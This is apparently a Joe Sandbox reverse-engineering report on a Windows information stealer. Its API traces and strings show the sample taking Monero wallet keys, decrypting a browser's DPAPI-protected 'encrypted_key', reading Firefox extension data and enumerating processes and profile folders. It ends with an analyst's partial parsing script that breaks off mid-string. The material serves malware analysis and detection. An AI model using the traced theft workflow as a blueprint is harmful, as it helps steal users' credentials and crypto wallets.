                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0038D481
                            • lstrlen.KERNEL32(00000000), ref: 0038D698
                            • lstrlen.KERNEL32(00000000), ref: 0038D6AC
                            • DeleteFileA.KERNEL32(00000000), ref: 0038D72B
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 3f9a3f4d45ceadd76c4e743b67ae6fe2b330e65b5b92fde0eafdbb092197317e
                            • Instruction ID: 922582bf5d6269c9307a87f0b82a4a81ca8ac03e21c9380f9b7b24045c087f1e
                            • Opcode Fuzzy Hash: 3f9a3f4d45ceadd76c4e743b67ae6fe2b330e65b5b92fde0eafdbb092197317e
                            • Instruction Fuzzy Hash: F3910E728105189BDF06FBA4DC96EEE7778AF14304F504268F507BA091EF346A49DBE2
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 00398B60: GetSystemTime.KERNEL32(003A0E1A,0115A250,003A05AE,?,?,003813F9,?,0000001A,003A0E1A,00000000,?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 00398B86
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0038D801
                            • lstrlen.KERNEL32(00000000), ref: 0038D99F
                            • lstrlen.KERNEL32(00000000), ref: 0038D9B3
                            • DeleteFileA.KERNEL32(00000000), ref: 0038DA32
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: af625d85f526364e9ef7779c8c918b222552ef01c9bec8a9de5df7a1153864d8
                            • Instruction ID: f3d36959b2809c2997caa072579169486ec5b1cd1aceca1a82d0fa4bb5b3b5b0
                            • Opcode Fuzzy Hash: af625d85f526364e9ef7779c8c918b222552ef01c9bec8a9de5df7a1153864d8
                            • Instruction Fuzzy Hash: EA8111729205189BDF06FBA4DC96DEE7778BF14300F504268F507AA091EF346A09DBE2
                            APIs
                              • Part of subcall function 0039A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0039A7E6
                              • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                              • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                              • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                              • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                              • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                              • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                              • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                              • Part of subcall function 0039A920: lstrcpy.KERNEL32(00000000,?), ref: 0039A972
                              • Part of subcall function 0039A920: lstrcat.KERNEL32(00000000), ref: 0039A982
                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,003A1580,003A0D92), ref: 0038F54C
                            • lstrlen.KERNEL32(00000000), ref: 0038F56B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                            • String ID: ^userContextId=4294967295$moz-extension+++
                            • API String ID: 998311485-3310892237
                            • Opcode ID: 33e005fff9cfb95157f22af441b41ffb73d1142856b4cb795a119b0d3425c198
                            • Instruction ID: 3719ad843e5e3d7a7fc1604642f2b2dc8c043dfdf228baf735376802ea49d2f4
                            • Opcode Fuzzy Hash: 33e005fff9cfb95157f22af441b41ffb73d1142856b4cb795a119b0d3425c198
                            • Instruction Fuzzy Hash: 4751F171D106089ADF05FBE4DC96DED7778AF54300F408628F816AB191EF346A09DBE2
                            Strings
                            • s9, xrefs: 003972AE, 00397179, 0039717C
                            • s9, xrefs: 00397111
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0039718C
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID: s9$s9$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 3722407311-539146638
                            • Opcode ID: dd82771ad797f90fe12b83881624d8f7a3538e85641617288abd253d02af95ce
                            • Instruction ID: 4c6fab5d56e97c335a0409147090bed9edfb0e38f856cd5f31bdf4ac78ab18a0
                            • Opcode Fuzzy Hash: dd82771ad797f90fe12b83881624d8f7a3538e85641617288abd253d02af95ce
                            • Instruction Fuzzy Hash: D7517FB1C142189BDF25EBA0DC82BEEB774AF44304F2445A8E1157A1C1EB746E88CF59
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 09a83b4b0b8d629d66388e322089814c1e8b9fd117247291840106e4d1d0d9c6
                            • Instruction ID: be9e13ba020817e8028eda20d1670d53116c715e20f4c03c9b2f793aebe88e21
                            • Opcode Fuzzy Hash: 09a83b4b0b8d629d66388e322089814c1e8b9fd117247291840106e4d1d0d9c6
                            • Instruction Fuzzy Hash: 63411FB1D10109AFDF05EFE4D885AFEB778EB54304F008518E5167B251DB75AA05CFA2
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                              • Part of subcall function 003899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003899EC
                              • Part of subcall function 003899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00389A11
                              • Part of subcall function 003899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00389A31
                              • Part of subcall function 003899C0: ReadFile.KERNEL32(000000FF,?,00000000,0038148F,00000000), ref: 00389A5A
                              • Part of subcall function 003899C0: LocalFree.KERNEL32(0038148F), ref: 00389A90
                              • Part of subcall function 003899C0: CloseHandle.KERNEL32(000000FF), ref: 00389A9A
                              • Part of subcall function 00398E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00398E52
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00389D39
                              • Part of subcall function 00389AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389AEF
                              • Part of subcall function 00389AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00384EEE,00000000,?), ref: 00389B01
                              • Part of subcall function 00389AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N8,00000000,00000000), ref: 00389B2A
                              • Part of subcall function 00389AC0: LocalFree.KERNEL32(?,?,?,?,00384EEE,00000000,?), ref: 00389B3F
                              • Part of subcall function 00389B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00389B84
                              • Part of subcall function 00389B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00389BA3
                              • Part of subcall function 00389B60: LocalFree.KERNEL32(?), ref: 00389BD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 831447147f16de682c1285c83c7769f8f28b575195cb9bc6471932c01a664bd1
                            • Instruction ID: aae334c1e298ad60e90db5df7fa8f0a175059b69aea0b97d015a34224787b20c
                            • Opcode Fuzzy Hash: 831447147f16de682c1285c83c7769f8f28b575195cb9bc6471932c01a664bd1
                            • Instruction Fuzzy Hash: 473110B5D10209ABCF05EBE4DC85BFEB7B8AB48304F184559E905A7241E7359A04CBA5
                            APIs
                              • Part of subcall function 0039A740: lstrcpy.KERNEL32(003A0E17,00000000), ref: 0039A788
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003A05B7), ref: 003986CA
                            • Process32First.KERNEL32(?,00000128), ref: 003986DE
                            • Process32Next.KERNEL32(?,00000128), ref: 003986F3
                              • Part of subcall function 0039A9B0: lstrlen.KERNEL32(?,01158FE0,?,\Monero\wallet.keys,003A0E17), ref: 0039A9C5
                              • Part of subcall function 0039A9B0: lstrcpy.KERNEL32(00000000), ref: 0039AA04
                              • Part of subcall function 0039A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0039AA12
                              • Part of subcall function 0039A8A0: lstrcpy.KERNEL32(?,003A0E17), ref: 0039A905
                            • CloseHandle.KERNEL32(?), ref: 00398761
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 99ada2e8db796f69c79db08df99908351a5f367c5d0c35e0cc7e251a8e443978
                            • Instruction ID: e200a4546d09bac8755ca038740d6f7c8204980b92bf94e79bce064a7257520b
                            • Opcode Fuzzy Hash: 99ada2e8db796f69c79db08df99908351a5f367c5d0c35e0cc7e251a8e443978
                            • Instruction Fuzzy Hash: CF316B71911618ABCF26DF90DC45FEEBBB8FF45700F104299E10AA61A0DB306A45CFA1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003A0E00,00000000,?), ref: 003979B0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003979B7
                            • GetLocalTime.KERNEL32(?,?,?,?,?,003A0E00,00000000,?), ref: 003979C4
                            • wsprintfA.USER32 ref: 003979F3
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: b7f386924b5cdf823cbff37be307c9b1c8664ff29223caa0f8c9ebbea3b855a6
                            • Instruction ID: 65e07c739a43ce62a096029178ec7b1534f3d1f637dbffe8b0be45d2fe566de1
                            • Opcode Fuzzy Hash: b7f386924b5cdf823cbff37be307c9b1c8664ff29223caa0f8c9ebbea3b855a6
                            • Instruction Fuzzy Hash: FA1123B2904518ABCB14DFCADD45FBEBBF8FB4CB15F10421AF605A2280E2395944DBB1
                            APIs
                            • __getptd.LIBCMT ref: 0039C74E
                              • Part of subcall function 0039BF9F: __amsg_exit.LIBCMT ref: 0039BFAF
                            • __getptd.LIBCMT ref: 0039C765
                            • __amsg_exit.LIBCMT ref: 0039C773
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0039C797
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: cef4593c7f1d94ae207e4897b63b2d30651d8630729fa8262f1db103701067fc
                            • Instruction ID: 0b502caa1777659a3f1fa81f0ddd8a4ad97179c9ab0871f1e6befd4b4f78c5f0
                            • Opcode Fuzzy Hash: cef4593c7f1d94ae207e4897b63b2d30651d8630729fa8262f1db103701067fc
                            • Instruction Fuzzy Hash: 27F09A32910A009FEF23BBF8A946B5AB3A0AF00720F255249F405AE2D2DB745D409E96
                            APIs
                              • Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00394F7A
                            • lstrcat.KERNEL32(?,003A1070), ref: 00394F97
                            • lstrcat.KERNEL32(?,01158F00), ref: 00394FAB
                            • lstrcat.KERNEL32(?,003A1074), ref: 00394FBD
                              • Part of subcall function 00394910: wsprintfA.USER32 ref: 0039492C
                              • Part of subcall function 00394910: FindFirstFileA.KERNEL32(?,?), ref: 00394943
                              • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FDC), ref: 00394971
                              • Part of subcall function 00394910: StrCmpCA.SHLWAPI(?,003A0FE0), ref: 00394987
                              • Part of subcall function 00394910: FindNextFileA.KERNEL32(000000FF,?), ref: 00394B7D
                              • Part of subcall function 00394910: FindClose.KERNEL32(000000FF), ref: 00394B92
                            Memory Dump Source
                            • Source File: 00000000.00000002.1800208993.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                            • Associated: 00000000.00000002.1800196481.0000000000380000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000431000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.000000000043D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.0000000000462000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800208993.00000000005CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.00000000005DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000767000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000841000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.0000000000865000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000086D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800322327.000000000087B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800505145.000000000087C000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800591244.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1800603025.0000000000A19000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_380000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: 551205a64b56b7b9297c4544a59af961fccf46dc4e4a828ef755ed4f37b579c2
                            • Instruction ID: 930e95796e892f7ca87ecfb79f1d3be219c2b881a93a4580ed450fc2723dcc5f
                            • Opcode Fuzzy Hash: 551205a64b56b7b9297c4544a59af961fccf46dc4e4a828ef755ed4f37b579c2
                            • Instruction Fuzzy Hash: C421DA7690020C6BCB55FBB0EC46EEE373CAB65304F004584B64996181EE749ACDCB92
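The record above is the one worth a second look for triage: SHGetFolderPathA with CSIDL 0x1C (CSIDL_LOCAL_APPDATA) resolves a user-profile folder, four lstrcat calls build a path under it, and the subcall at 00394910 runs the usual FindFirstFileA / StrCmpCA / FindNextFileA / FindClose loop over that directory. As an added example (not Joe Sandbox tooling and not code from the sample), the script below parses the "APIs" entries in the format this report prints them, decodes the CSIDL argument, and flags the profile-folder enumeration pattern. The CSIDL table is a handful of well-known values; the report does not show the strings behind the two StrCmpCA calls, so reading them as the "." and ".." skip is an assumption, labelled as such in the code.

```python
"""Parse Joe Sandbox 'APIs' entries and flag a profile-folder file-enumeration
pattern.  Added example for reading this report, not Joe Sandbox code."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed input: the API entries of the lstrcat/FindFirstFileA record,
# copied verbatim from the report above.
SAMPLE = """\
• Part of subcall function 00398DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00398E0B
• lstrcat.KERNEL32(?,00000000), ref: 00394F7A
• lstrcat.KERNEL32(?,003A1070), ref: 00394F97
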